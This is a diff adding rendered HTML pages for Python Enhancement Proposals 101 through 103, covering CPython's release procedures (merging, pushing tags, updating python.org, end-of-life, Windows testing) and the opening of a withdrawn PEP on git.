    +

    To ensure that the regression test suite passes. If not, you +screwed up somewhere!

    +
  • +
+
+

Warning

+

STOP and confirm:

+
    +
  • Have you gotten the green light from the WE?
  • +
  • Have you gotten the green light from the ME?
  • +
  • Have you gotten the green light from the DE?
  • +
+
+

If green, it’s time to merge the release engineering branch back into +the main repo.

+
    +
  • In order to push your changes to GitHub, you’ll have to temporarily +disable branch protection for administrators. Go to the +Settings | Branches page:

    https://github.com/python/cpython/settings/branches

    +

    “Edit” the settings for the branch you’re releasing on. +This will load the settings page for that branch. +Uncheck the “Include administrators” box and press the +“Save changes” button at the bottom.

    +
  • +
  • Merge your release clone into the main development repo:
    # Pristine copy of the upstream repo branch
    +git clone git@github.com:python/cpython.git merge
    +cd merge
    +
    +# Checkout the correct branch:
    +# 1. For feature pre-releases up to and including a
    +#    **new branch** release, i.e. alphas and first beta
    +#   do a checkout of the main branch
    +git checkout main
    +
    +# 2. Else, for all other releases, checkout the
    +#       appropriate release branch.
    +git checkout 3.X
    +
    +# Fetch the newly created and signed tag from your clone repo
    +git fetch --tags git@github.com:your-github-id/cpython.git v3.X.YaN
    +# Merge the temporary release engineering branch back into
    +git merge --no-squash v3.X.YaN
    +git commit -m 'Merge release engineering branch'
    +
    +
    +
  • +
  • If this is a new branch release, i.e. first beta, +now create the new release branch:
    git checkout -b 3.X
    +
    +
    +

    Do any steps needed to setup the new release branch, including:

    +
      +
    • In README.rst, change all references from main to +the new branch, in particular, GitHub repo URLs.
    • +
    +
  • +
  • For all releases, do the guided post-release steps with the +release script:
    .../release-tools/release.py --done 3.X.YaN
    +
    +
    +
  • +
  • For a final or release candidate 2+ release, you may need to +do some post-merge cleanup. Check the top-level README.rst +and include/patchlevel.h files to ensure they now reflect +the desired post-release values for on-going development. +The patchlevel should be the release tag with a +. +Also, if you cherry-picked changes from the standard release +branch into the release engineering branch for this release, +you will now need to manually remove each blurb entry from +the Misc/NEWS.d/next directory that was cherry-picked +into the release you are working on since that blurb entry +is now captured in the merged x.y.z.rst file for the new +release. Otherwise, the blurb entry will appear twice in +the changelog.html file, once under Python next and again +under x.y.z.
  • +
  • Review and commit these changes:
    git commit -m 'Post release updates'
    +
    +
    +
  • +
  • If this is a new branch release (e.g. the first beta), +update the main branch to start development for the +following feature release. When finished, the main +branch will now build Python X.Y+1.
      +
    • First, set main up to be the next release, i.e. X.Y+1.a0:
      git checkout main
      +.../release-tools/release.py --bump 3.9.0a0
      +
      +
      +
    • +
    • Edit all version references in README.rst
    • +
    • Edit Doc/tutorial/interpreter.rst (two references to ‘[Pp]ython3x’, +one to ‘Python 3.x’, also make the date in the banner consistent).
    • +
    • Edit Doc/tutorial/stdlib.rst and Doc/tutorial/stdlib2.rst, which +have each one reference to ‘[Pp]ython3x’.
    • +
    • Add a new whatsnew/3.x.rst file (with the comment near the top +and the toplevel sections copied from the previous file) and +add it to the toctree in whatsnew/index.rst. But beware that +the initial whatsnew/3.x.rst checkin from previous releases +may be incorrect due to the initial midstream change to blurb +that propagates from release to release! Help break the cycle: if +necessary make the following change:
      -For full details, see the :source:`Misc/NEWS` file.
      ++For full details, see the :ref:`changelog <changelog>`.
      +
      +
      +
    • +
    • Update the version number in configure.ac and re-run autoconf.
    • +
    • Make sure the SOURCE_URI in Doc/tools/extensions/pyspecific.py +points to main.
    • +
    • Update the version numbers for the Windows builds +which have references to python38:
      ls PC/pyconfig.h.in PCbuild/rt.bat | xargs sed -i 's/python3\(\.\?\)[0-9]\+/python3\19/g'
      +
      +
      +
    • +
    • Edit the bug.yml and crash.yml issue templates in +.github/ISSUE_TEMPLATE/ to add the new branch to the +“versions” dropdown.
    • +
    • Commit these changes to the main branch:
      git status
      +git add ...
      +git commit -m 'Bump to 3.9.0a0'
      +
      +
      +
    • +
    +
  • +
  • Do another git status in this directory.

    You should not see any files, i.e., you better not have any uncommitted +changes in your working directory.

    +
  • +
  • Commit and push to the main repo:
    # Do a dry run first.
    +
    +# For feature pre-releases prior to a **new branch** release,
    +#   i.e. a feature alpha release:
    +git push --dry-run --tags  git@github.com:python/cpython.git main
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git main
    +
    +# For a **new branch** release, i.e. first beta:
    +git push --dry-run --tags  git@github.com:python/cpython.git 3.X
    +git push --dry-run --tags  git@github.com:python/cpython.git main
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git 3.X
    +git push --tags  git@github.com:python/cpython.git main
    +
    +# For all other releases:
    +git push --dry-run --tags  git@github.com:python/cpython.git 3.X
    +# If it looks OK, take the plunge.  There's no going back!
    +git push --tags  git@github.com:python/cpython.git 3.X
    +
    +
    +
  • +
  • If this is a new branch release, add a Branch protection rule +for the newly created branch (3.X). Look at the values for the previous +release branch (3.X-1) and use them as a template. +https://github.com/python/cpython/settings/branches

    Also, add 3.x and needs backport to 3.X labels to the GitHub repo. +https://github.com/python/cpython/labels

    +
  • +
  • You can now re-enable enforcement of branch settings against administrators +on GitHub. Go back to the Settings | Branch page:

    https://github.com/python/cpython/settings/branches

    +

    “Edit” the settings for the branch you’re releasing on. +Re-check the “Include administrators” box and press the +“Save changes” button at the bottom.

    +
  • +
+

Now it’s time to twiddle the website. Almost none of this is automated, sorry.

+

To do these steps, you must have the permission to edit the website. If you +don’t have that, ask someone on pydotorg@python.org for the proper +permissions.

+
    +
  • Log in to https://www.python.org/admin
  • +
  • Create a new “release” for the release. Currently “Releases” are +sorted under “Downloads”.

    The easiest thing is probably to copy fields from an existing +Python release “page”, editing as you go.

    +

    You can use Markdown or +reStructured Text +to describe your release. The former is less verbose, while the latter has nifty +integration for things like referencing PEPs.

    +

    Leave the “Release page” field on the form empty.

    +
  • +
  • “Save” the release.
  • +
  • Populate the release with the downloadable files.

    Your friend and mine, Georg Brandl, made a lovely tool +called add_to_pydotorg.py. You can find it in the +python/release-tools repo (next to release.py). You run the +tool on downloads.nyc1.psf.io, like this:

    +
    AUTH_INFO=<username>:<python.org-api-key> python add_to_pydotorg.py <version>
    +
    +
    +

    This walks the correct download directory for <version>, +looks for files marked with <version>, and populates +the “Release Files” for the correct “release” on the web +site with these files. Note that clears the “Release Files” +for the relevant version each time it’s run. You may run +it from any directory you like, and you can run it as +many times as you like if the files happen to change. +Keep a copy in your home directory on dl-files and +keep it fresh.

    +

    If new types of files are added to the release, someone will need to +update add_to_pydotorg.py so it recognizes these new files. +(It’s best to update add_to_pydotorg.py when file types +are removed, too.)

    +

    The script will also sign any remaining files that were not +signed with Sigstore until this point. Again, if this happens, +do use your @python.org address for this process. More info: +https://www.python.org/download/sigstore/

    +
  • +
  • In case the CDN already cached a version of the Downloads page +without the files present, you can invalidate the cache using:
    curl -X PURGE https://www.python.org/downloads/release/python-XXX/
    +
    +
    +
  • +
  • If this is a final release:
      +
    • Add the new version to the Python Documentation by Version +page https://www.python.org/doc/versions/ and +remove the current version from any ‘in development’ section.
    • +
    • For 3.X.Y, edit all the previous X.Y releases’ page(s) to +point to the new release. This includes the content field of the +Downloads -> Releases entry for the release:
      Note: Python 3.x.(y-1) has been superseded by
      +`Python 3.x.y </downloads/release/python-3xy/>`_.
      +
      +
      +

      And, for those releases having separate release page entries +(phasing these out?), update those pages as well, +e.g. download/releases/3.x.y:

      +
      Note: Python 3.x.(y-1) has been superseded by
      +`Python 3.x.y </download/releases/3.x.y/>`_.
      +
      +
      +
    • +
    • Update the “Current Pre-release Testing Versions web page”.

      There’s a page that lists all the currently-in-testing versions +of Python:

      + +

      Every time you make a release, one way or another you’ll +have to update this page:

      +
        +
      • If you’re releasing a version before 3.x.0, +you should add it to this page, removing the previous pre-release +of version 3.x as needed.
      • +
      • If you’re releasing 3.x.0 final, you need to remove the pre-release +version from this page.
      • +
      +

      This is in the “Pages” category on the Django-based website, and finding +it through that UI is kind of a chore. However! If you’re already logged +in to the admin interface (which, at this point, you should be), Django +will helpfully add a convenient “Edit this page” link to the top of the +page itself. So you can simply follow the link above, click on the +“Edit this page” link, and make your changes as needed. How convenient!

      +
    • +
    • If appropriate, update the “Python Documentation by Version” page: +

      This lists all releases of Python by version number and links to their +static (not built daily) online documentation. There’s a list at the +bottom of in-development versions, which is where all alphas/betas/RCs +should go. And yes you should be able to click on the link above then +press the shiny, exciting “Edit this page” button.

      +
    • +
    +
  • +
  • Write the announcement on discuss.python.org. This is the +fuzzy bit because not much can be automated. You can use an earlier +announcement as a template, but edit it for content!
  • +
  • Once the announcement is up on Discourse, send an equivalent to the +following mailing lists: +
  • +
  • Also post the announcement to the +Python Insider blog. +To add a new entry, go to +your Blogger home page.
  • +
  • Update release PEPs +(e.g. 719) with the release dates.
  • +
  • Update the labels on https://github.com/python/cpython/issues:
      +
    • Flip all the deferred-blocker issues back to release-blocker +for the next release.
    • +
    • Review open issues, as this might find lurking showstopper bugs, +besides reminding people to fix the easy ones they forgot about.
    • +
    +
  • +
  • You can delete the remote release clone branch from your repo clone.
  • +
  • If this is a new branch release, you will need to ensure various +pieces of the development infrastructure are updated for the new branch. +These include:
      +
    • Update the issue tracker for the new branch: +add the new version to the versions list.
    • +
    • Update the devguide +to reflect the new branches and versions.
    • +
    • Create a PR to update the supported releases table on the +downloads page (see +python/pythondotorg#1302).
    • +
    • Ensure buildbots are defined for the new branch (contact Łukasz +or Zach Ware).
    • +
    • Ensure the various GitHub bots are updated, as needed, for the +new branch. In particular, make sure backporting to the new +branch works (contact the core-workflow team).
    • +
    • Review the most recent commit history for the main and new release +branches to identify and backport any merges that might have been made +to the main branch during the release engineering phase and that +should be in the release branch.
    • +
    • Verify that CI is working for new PRs for the main and new release +branches and that the release branch is properly protected (no direct +pushes, etc).
    • +
    • Verify that the online docs are building +properly (this may take up to 24 hours for a complete build on the website).
    • +
    +
  • +
+
+
+

What Next?

+
    +
  • Verify! Pretend you’re a user: download the files from www.python.org, and +make Python from it. This step is too easy to overlook, and on several +occasions we’ve had useless release files. Once a general server problem +caused mysterious corruption of all files; once the source tarball got +built incorrectly; more than once the file upload process on SF truncated +files; and so on.
  • +
  • Rejoice. Drink. Be Merry. Write a PEP like this one. Or be +like unto Guido and take A Vacation.
  • +
+

You’ve just made a Python release!

+
+
+

Moving to End-of-life

+

Under current policy, a release branch normally reaches end-of-life status +five years after its initial release. The policy is discussed in more detail +in the Python Developer’s Guide. +When end-of-life is reached, there are a number of tasks that need to be +performed either directly by you as release manager or by ensuring someone +else does them. Some of those tasks include:

+
    +
  • Optionally making a final release to publish any remaining unreleased +changes.
  • +
  • Freeze the state of the release branch by creating a tag of its current HEAD +and then deleting the branch from the CPython repo. The current HEAD should +be at or beyond the final security release for the branch:
    git fetch upstream
    +git tag --sign -m 'Final head of the former 3.3 branch' 3.3 upstream/3.3
    +git push upstream refs/tags/3.3
    +
    +
    +
  • +
  • If all looks good, delete the branch. This may require the assistance of +someone with repo administrator privileges:
    git push upstream --delete 3.3  # or perform from GitHub Settings page
    +
    +
    +
  • +
  • Remove the release from the list of “Active Python Releases” on the Downloads +page. To do this, log in to the admin page +for python.org, navigate to Boxes, +and edit the downloads-active-releases entry. Strip out the relevant +paragraph of HTML for your release. (You’ll probably have to do the curl -X PURGE +trick to purge the cache if you want to confirm you made the change correctly.)
  • +
  • Add a retired notice to each release page on python.org for the retired branch. +For example: +
  • +
  • In the developer’s guide, +set the branch status to end-of-life +and update or remove references to the branch elsewhere in the devguide.
  • +
  • Retire the release from the issue tracker. Tasks include:
      +
    • update issues from this version to the next supported version
    • +
    • remove version label from list of versions
    • +
    • remove the needs backport to label for the retired version
    • +
    • review and dispose of open issues marked for this branch
    • +
    +
  • +
  • Run a final build of the online docs to add the end-of-life banner
  • +
  • Announce the branch retirement in the usual places:
      +
    • discuss.python.org
    • +
    • mailing lists (python-dev, python-list, python-announcements)
    • +
    • Python Dev blog
    • +
    +
  • +
  • Enjoy your retirement and bask in the glow of a job well done!
  • +
+
+
+

Windows Notes

+

Windows has a MSI installer, various flavors of Windows have +“special limitations”, and the Windows installer also packs +precompiled “foreign” binaries (Tcl/Tk, expat, etc).

+

The installer is tested as part of the Azure Pipeline. In the past, +those steps were performed manually. We’re keeping this for posterity.

+

Concurrent with uploading the installer, the WE installs Python +from it twice: once into the default directory suggested by the +installer, and later into a directory with embedded spaces in its +name. For each installation, the WE runs the full regression suite +from a DOS box, and both with and without -0. For maintenance +release, the WE also tests whether upgrade installations succeed.

+

The WE also tries every shortcut created under Start -> Menu -> the +Python group. When trying IDLE this way, you need to verify that +Help -> Python Documentation works. When trying pydoc this way +(the “Module Docs” Start menu entry), make sure the “Start +Browser” button works, and make sure you can search for a random +module (like “random” <wink>) and then that the “go to selected” +button works.

+

It’s amazing how much can go wrong here – and even more amazing +how often last-second checkins break one of these things. If +you’re “the Windows geek”, keep in mind that you’re likely the +only person routinely testing on Windows, and that Windows is +simply a mess.

+

Repeat the testing for each target architecture. Try both an +Admin and a plain User (not Power User) account.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0101.rst

+

Last modified: 2024-11-26 06:56:41 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0102/index.html b/pep-0102/index.html new file mode 100644 index 00000000000..de1508f60ed --- /dev/null +++ b/pep-0102/index.html @@ -0,0 +1,549 @@ + + + + + + + + PEP 102 – Doing Python Micro Releases | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 102 – Doing Python Micro Releases

+
+
Author:
+
Anthony Baxter <anthony at interlink.com.au>, +Barry Warsaw <barry at python.org>, +Guido van Rossum <guido at python.org>
+
Status:
+
Superseded
+
Type:
+
Informational
+
Created:
+
09-Jan-2002
+
Post-History:
+

+
Superseded-By:
+
101
+
+
+
+
Table of Contents +
+
+

Replacement Note

+

Although the size of the to-do list in this PEP is much less scary +than that in PEP 101, it turns out not to be enough justification +for the duplication of information, and with it, the danger of one +of the copies to become out of date. Therefore, this PEP is not +maintained anymore, and micro releases are fully covered by PEP 101.

+
+
+

Abstract

+

Making a Python release is an arduous process that takes a +minimum of half a day’s work even for an experienced releaser. +Until recently, most – if not all – of that burden was borne by +Guido himself. But several recent releases have been performed by +other folks, so this PEP attempts to collect, in one place, all +the steps needed to make a Python bugfix release.

+

The major Python release process is covered in PEP 101 - this PEP +is just PEP 101, trimmed down to only include the bits that are +relevant for micro releases, a.k.a. patch, or bug fix releases.

+

It is organized as a recipe and you can actually print this out and +check items off as you complete them.

+
+
+

How to Make A Release

+

Here are the steps taken to make a Python release. Some steps are +more fuzzy than others because there’s little that can be +automated (e.g. writing the NEWS entries). Where a step is +usually performed by An Expert, the name of that expert is given. +Otherwise, assume the step is done by the Release Manager (RM), +the designated person performing the release. Almost every place +the RM is mentioned below, this step can also be done by the BDFL +of course!

+

XXX: We should include a dependency graph to illustrate the steps +that can be taken in parallel, or those that depend on other +steps.

+

We use the following conventions in the examples below. Where a +release number is given, it is of the form X.Y.MaA, e.g. 2.1.2c1 +for Python 2.1.2 release candidate 1, where “a” == alpha, “b” == +beta, “c” == release candidate. Final releases are tagged with +“releaseXYZ” in CVS. The micro releases are made from the +maintenance branch of the major release, e.g. Python 2.1.2 is made +from the release21-maint branch.

+
    +
  1. Send an email to python-dev@python.org indicating the release is +about to start.
  2. +
  3. Put a freeze on check ins into the maintenance branch. At this +point, nobody except the RM should make any commits to the branch +(or his duly assigned agents, i.e. Guido the BDFL, Fred Drake for +documentation, or Thomas Heller for Windows). If the RM screwed up +and some desperate last minute change to the branch is +necessary, it can mean extra work for Fred and Thomas. So try to +avoid this!
  4. +
  5. On the branch, change Include/patchlevel.h in two places, to +reflect the new version number you’ve just created. You’ll want +to change the PY_VERSION macro, and one or several of the +version subpart macros just above PY_VERSION, as appropriate.
  6. +
  7. Change the “%define version” line of Misc/RPM/python-2.3.spec to the +same string as PY_VERSION was changed to above. E.g:
    %define version 2.3.1
    +
    +
    +

    You also probably want to reset the %define release line +to ‘1pydotorg’ if it’s not already that.

    +
  8. +
  9. If you’re changing the version number for Python (e.g. from +Python 2.1.1 to Python 2.1.2), you also need to update the +README file, which has a big banner at the top proclaiming its +identity. Don’t do this if you’re just releasing a new alpha or +beta release, but /do/ do this if you’re release a new micro, +minor or major release.
  10. +
  11. The LICENSE file also needs to be changed, due to several +references to the release number. As for the README file, changing +these are necessary for a new micro, minor or major release.

    The LICENSE file contains a table that describes the legal +heritage of Python; you should add an entry for the X.Y.Z +release you are now making. You should update this table in the +LICENSE file on the CVS trunk too.

    +
  12. +
  13. When the year changes, copyright legends need to be updated in +many places, including the README and LICENSE files.
  14. +
  15. For the Windows build, additional files have to be updated.

    PCbuild/BUILDno.txt contains the Windows build number, see the +instructions in this file how to change it. Saving the project +file PCbuild/pythoncore.dsp results in a change to +PCbuild/pythoncore.dsp as well.

    +

    PCbuild/python20.wse sets up the Windows installer version +resource (displayed when you right-click on the installer .exe +and select Properties), and also contains the Python version +number.

    +

    (Before version 2.3.2, it was required to manually edit +PC/python_nt.rc, this step is now automated by the build +process.)

    +
  16. +
  17. After starting the process, the most important thing to do next +is to update the Misc/NEWS file. Thomas will need this in order to +do the Windows release and he likes to stay up late. This step +can be pretty tedious, so it’s best to get to it immediately +after making the branch, or even before you’ve made the branch. +The sooner the better (but again, watch for new checkins up +until the release is made!)

    Add high level items new to this release. E.g. if we’re +releasing 2.2a3, there must be a section at the top of the file +explaining “What’s new in Python 2.2a3”. It will be followed by +a section entitled “What’s new in Python 2.2a2”.

    +

    Note that you /hope/ that as developers add new features to the +trunk, they’ve updated the NEWS file accordingly. You can’t be +positive, so double check. If you’re a Unix weenie, it helps to +verify with Thomas about changes on Windows, and Jack Jansen +about changes on the Mac.

    +

    This command should help you (but substitute the correct -r tag!):

    +
    % cvs log -rr22a1: | python Tools/scripts/logmerge.py > /tmp/news.txt
    +
    +
    +

    IOW, you’re printing out all the cvs log entries from the +previous release until now. You can then troll through the +news.txt file looking for interesting things to add to NEWS.

    +
  18. +
  19. Check your NEWS changes into the maintenance branch. It’s easy +to forget to update the release date in this file!
  20. +
  21. Check in any changes to IDLE’s NEWS.txt. Update the header in +Lib/idlelib/NEWS.txt to reflect its release version and date. +Update the IDLE version in Lib/idlelib/idlever.py to match.
  22. +
+
    +
  1. Once the release process has started, the documentation needs to +be built and posted on python.org according to the instructions +in PEP 101.

    Note that Fred is responsible both for merging doc changes from +the trunk to the branch AND for merging any branch changes from +the branch to the trunk during the cleaning up phase. +Basically, if it’s in Doc/ Fred will take care of it.

    +
  2. +
  3. Thomas compiles everything with MSVC 6.0 SP5, and moves the +python23.chm file into the src/chm directory. The installer +executable is then generated with Wise Installation System.

    The installer includes the MSVC 6.0 runtime in the files +MSVCRT.DLL and MSVCIRT.DLL. It leads to disaster if these files +are taken from the system directory of the machine where the +installer is built, instead it must be absolutely made sure that +these files come from the VCREDIST.EXE redistributable package +contained in the MSVC SP5 CD. VCREDIST.EXE must be unpacked +with winzip, and the Wise Installation System prompts for the +directory.

    +

    After building the installer, it should be opened with winzip, +and the MS dlls extracted again and check for the same version +number as those unpacked from VCREDIST.EXE.

    +

    Thomas uploads this file to the starship. He then sends the RM +a notice which includes the location and MD5 checksum of the +Windows executable.

    +

    Note that Thomas’s creation of the Windows executable may generate +a few more commits on the branch. Thomas will be responsible for +merging Windows-specific changes from trunk to branch, and from +branch to trunk.

    +
  4. +
  5. Sean performs his Red Hat magic, generating a set of RPMs. He +uploads these files to python.org. He then sends the RM a notice +which includes the location and MD5 checksum of the RPMs.
  6. +
  7. It’s Build Time!

    Now, you’re ready to build the source tarball. First cd to your +working directory for the branch. E.g. +% cd …/python-22a3

    +
  8. +
  9. Do a “cvs update” in this directory. Do NOT include the -A flag!

    You should not see any “M” files, but you may see several “P” +and/or “U” files. I.e. you better not have any uncommitted +changes in your working directory, but you may pick up some of +Fred’s or Thomas’s last minute changes.

    +
  10. +
  11. Now tag the branch using a symbolic name like “rXYMaZ”, +e.g. r212
    % cvs tag r212
    +
    +
    +

    Be sure to tag only the python/dist/src subdirectory of the +Python CVS tree!

    +
  12. +
  13. Change to a neutral directory, i.e. one in which you can do a +fresh, virgin, cvs export of the branch. You will be creating a +new directory at this location, to be named “Python-X.Y.M”. Do +a CVS export of the tagged branch.
    % cd ~
    +% cvs -d cvs.sf.net:/cvsroot/python export -rr212 \
    +                      -d Python-2.1.2 python/dist/src
    +
    +
    +
  14. +
  15. Generate the tarball. Note that we’re not using the ‘z’ option +on the tar command because 1) that’s only supported by GNU tar +as far as we know, and 2) we’re going to max out the compression +level, which isn’t a supported option. We generate both tar.gz +tar.bz2 formats, as the latter is about 1/6th smaller.
    % tar -cf - Python-2.1.2 | gzip -9 > Python-2.1.2.tgz
    +% tar -cf - Python-2.1.2 | bzip2 -9 > Python-2.1.2.tar.bz2
    +
    +
    +
  16. +
  17. Calculate the MD5 checksum of the tgz and tar.bz2 files you +just created
    % md5sum Python-2.1.2.tgz
    +
    +
    +

    Note that if you don’t have the md5sum program, there is a +Python replacement in the Tools/scripts/md5sum.py file.

    +
  18. +
  19. Create GPG keys for each of the files.
    % gpg -ba Python-2.1.2.tgz
    +% gpg -ba Python-2.1.2.tar.bz2
    +% gpg -ba Python-2.1.2.exe
    +
    +
    +
  20. +
  21. Now you want to perform the very important step of checking the +tarball you just created, to make sure a completely clean, +virgin build passes the regression test. Here are the best +steps to take:
    % cd /tmp
    +% tar zxvf ~/Python-2.1.2.tgz
    +% cd Python-2.1.2
    +% ls
    +(Do things look reasonable?)
    +% ./configure
    +(Loads of configure output)
    +% make test
    +(Do all the expected tests pass?)
    +
    +
    +

    If the tests pass, then you can feel good that the tarball is +fine. If some of the tests fail, or anything else about the +freshly unpacked directory looks weird, you better stop now and +figure out what the problem is.

    +
  22. +
  23. You need to upload the tgz and the exe file to creosote.python.org. +This step can take a long time depending on your network +bandwidth. scp both files from your own machine to creosote.
  24. +
  25. While you’re waiting, you can start twiddling the web pages to +include the announcement.
      +
    1. In the top of the python.org web site CVS tree, create a +subdirectory for the X.Y.Z release. You can actually copy an +earlier patch release’s subdirectory, but be sure to delete +the X.Y.Z/CVS directory and “cvs add X.Y.Z”, for example:
      % cd .../pydotorg
      +% cp -r 2.2.2 2.2.3
      +% rm -rf 2.2.3/CVS
      +% cvs add 2.2.3
      +% cd 2.2.3
      +
      +
      +
    2. +
    3. Edit the files for content: usually you can globally replace +X.Ya(Z-1) with X.YaZ. However, you’ll need to think about the +“What’s New?” section.
    4. +
    5. Copy the Misc/NEWS file to NEWS.txt in the X.Y.Z directory for +python.org; this contains the “full scoop” of changes to +Python since the previous release for this version of Python.
    6. +
    7. Copy the .asc GPG signatures you created earlier here as well.
    8. +
    9. Also, update the MD5 checksums.
    10. +
    11. Preview the web page by doing a “make” or “make install” (as +long as you’ve created a new directory for this release!)
    12. +
    13. Similarly, edit the ../index.ht file, i.e. the python.org home +page. In the Big Blue Announcement Block, move the paragraph +for the new version up to the top and boldify the phrase +“Python X.YaZ is out”. Edit for content, and preview locally, +but do NOT do a “make install” yet!
    14. +
    +
  26. +
  27. Now we’re waiting for the scp to creosote to finish. Da de da, +da de dum, hmm, hmm, dum de dum.
  28. +
  29. Once that’s done you need to go to creosote.python.org and move +all the files in place over there. Our policy is that every +Python version gets its own directory, but each directory may +contain several releases. We keep all old releases, moving them +into a “prev” subdirectory when we have a new release.

    So, there’s a directory called “2.2” which contains +Python-2.2a2.exe and Python-2.2a2.tgz, along with a “prev” +subdirectory containing Python-2.2a1.exe and Python-2.2a1.tgz.

    +

    So…

    +
      +
    1. On creosote, cd to ~ftp/pub/python/X.Y creating it if +necessary.
    2. +
    3. Move the previous release files to a directory called “prev” +creating the directory if necessary (make sure the directory +has g+ws bits on). If this is the first alpha release of a +new Python version, skip this step.
    4. +
    5. Move the .tgz file and the .exe file to this directory. Make +sure they are world readable. They should also be group +writable, and group-owned by webmaster.
    6. +
    7. md5sum the files and make sure they got uploaded intact.
    8. +
    +
  30. +
  31. the X.Y/bugs.ht file if necessary. It is best to get +BDFL input for this step.
  32. +
  33. Go up to the parent directory (i.e. the root of the web page +hierarchy) and do a “make install” there. You’re release is now +live!
  34. +
  35. Now it’s time to write the announcement for the mailing lists. +This is the fuzzy bit because not much can be automated. You +can use one of Guido’s earlier announcements as a template, but +please edit it for content!

    Once the announcement is ready, send it to the following +addresses:

    +
    python-list@python.org
    +python-announce@python.org
    +python-dev@python.org
    +
    +
    +
  36. +
  37. Send a SourceForge News Item about the release. From the +project’s “menu bar”, select the “News” link; once in News, +select the “Submit” link. Type a suitable subject (e.g. “Python +2.2c1 released” :-) in the Subject box, add some text to the +Details box (at the very least including the release URL at +www.python.org and the fact that you’re happy with the release) +and click the SUBMIT button.

    Feel free to remove any old news items.

    +
  38. +
+

Now it’s time to do some cleanup. These steps are very important!

+
    +
  1. Edit the file Include/patchlevel.h so that the PY_VERSION +string says something like “X.YaZ+”. Note the trailing ‘+’ +indicating that the trunk is going to be moving forward with +development. E.g. the line should look like:
    #define PY_VERSION              "2.1.2+"
    +
    +
    +

    Make sure that the other PY_ version macros contain the +correct values. Commit this change.

    +
  2. +
  3. For the extra paranoid, do a completely clean test of the +release. This includes downloading the tarball from +www.python.org.
  4. +
  5. Make sure the md5 checksums match. Then unpack the tarball, +and do a clean make test.
    % make distclean
    +% ./configure
    +% make test
    +
    +
    +

    To ensure that the regression test suite passes. If not, you +screwed up somewhere!

    +
  6. +
+

Step 5 …

+

Verify! This can be interleaved with Step 4. Pretend you’re a +user: download the files from python.org, and make Python from +it. This step is too easy to overlook, and on several occasions +we’ve had useless release files. Once a general server problem +caused mysterious corruption of all files; once the source tarball +got built incorrectly; more than once the file upload process on +SF truncated files; and so on.

+
+
+

What Next?

+

Rejoice. Drink. Be Merry. Write a PEP like this one. Or be +like unto Guido and take A Vacation.

+

You’ve just made a Python release!

+

Actually, there is one more step. You should turn over ownership +of the branch to Jack Jansen. All this means is that now he will +be responsible for making commits to the branch. He’s going to +use this to build the MacOS versions. He may send you information +about the Mac release that should be merged into the informational +pages on www.python.org. When he’s done, he’ll tag the branch +something like “rX.YaZ-mac”. He’ll also be responsible for +merging any Mac-related changes back into the trunk.

+
+
+

Final Release Notes

+

The Final release of any major release, e.g. Python 2.2 final, has +special requirements, specifically because it will be one of the +longest lived releases (i.e. betas don’t last more than a couple +of weeks, but final releases can last for years!).

+

For this reason we want to have a higher coordination between the +three major releases: Windows, Mac, and source. The Windows and +source releases benefit from the close proximity of the respective +release-bots. But the Mac-bot, Jack Jansen, is 6 hours away. So +we add this extra step to the release process for a final +release:

+
    +
  1. Hold up the final release until Jack approves, or until we +lose patience <wink>.
  2. +
+

The python.org site also needs some tweaking when a new bugfix release +is issued.

+
    +
  1. The documentation should be installed at doc/<version>/.
  2. +
  3. Add a link from doc/<previous-minor-release>/index.ht to the +documentation for the new version.
  4. +
  5. All older doc/<old-release>/index.ht files should be updated to +point to the documentation for the new version.
  6. +
  7. /robots.txt should be modified to prevent the old version’s +documentation from being crawled by search engines.
  8. +
+
+
+

Windows Notes

+

Windows has a GUI installer, various flavors of Windows have +“special limitations”, and the Windows installer also packs +precompiled “foreign” binaries (Tcl/Tk, expat, etc). So Windows +testing is tiresome but very necessary.

+

Concurrent with uploading the installer, Thomas installs Python +from it twice: once into the default directory suggested by the +installer, and later into a directory with embedded spaces in its +name. For each installation, he runs the full regression suite +from a DOS box, and both with and without -0.

+

He also tries every shortcut created under Start -> Menu -> the +Python group. When trying IDLE this way, you need to verify that +Help -> Python Documentation works. When trying pydoc this way +(the “Module Docs” Start menu entry), make sure the “Start +Browser” button works, and make sure you can search for a random +module (Thomas uses “random” <wink>) and then that the “go to +selected” button works.

+

It’s amazing how much can go wrong here – and even more amazing +how often last-second checkins break one of these things. If +you’re “the Windows geek”, keep in mind that you’re likely the +only person routinely testing on Windows, and that Windows is +simply a mess.

+

Repeat all of the above on at least one flavor of Win9x, and one +of NT/2000/XP. On NT/2000/XP, try both an Admin and a plain User +(not Power User) account.

+

WRT Step 5 above (verify the release media), since by the time +release files are ready to download Thomas has generally run many +Windows tests on the installer he uploaded, he usually doesn’t do +anything for Step 5 except a full byte-comparison (“fc /b” if +using a Windows shell) of the downloaded file against the file he +uploaded.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0102.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0103/index.html b/pep-0103/index.html new file mode 100644 index 00000000000..1f68a7f0be7 --- /dev/null +++ b/pep-0103/index.html @@ -0,0 +1,1107 @@ + + + + + + + + PEP 103 – Collecting information about git | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 103 – Collecting information about git

+
+
Author:
+
Oleg Broytman <phd at phdru.name>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
01-Jun-2015
+
Post-History:
+
12-Sep-2015
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

It is too generic and doesn’t really deal +with Python development. It is no longer updated.

+

The content was moved to Python Wiki. Make further updates in the +wiki.

+

+
+
+

Abstract

+

This Informational PEP collects information about git. There is, of +course, a lot of documentation for git, so the PEP concentrates on +more complex (and more related to Python development) issues, +scenarios and examples.

+

The plan is to extend the PEP in the future collecting information +about equivalence of Mercurial and git scenarios to help migrating +Python development from Mercurial to git.

+

The author of the PEP doesn’t currently plan to write a Process PEP on +migration Python development from Mercurial to git.

+
+
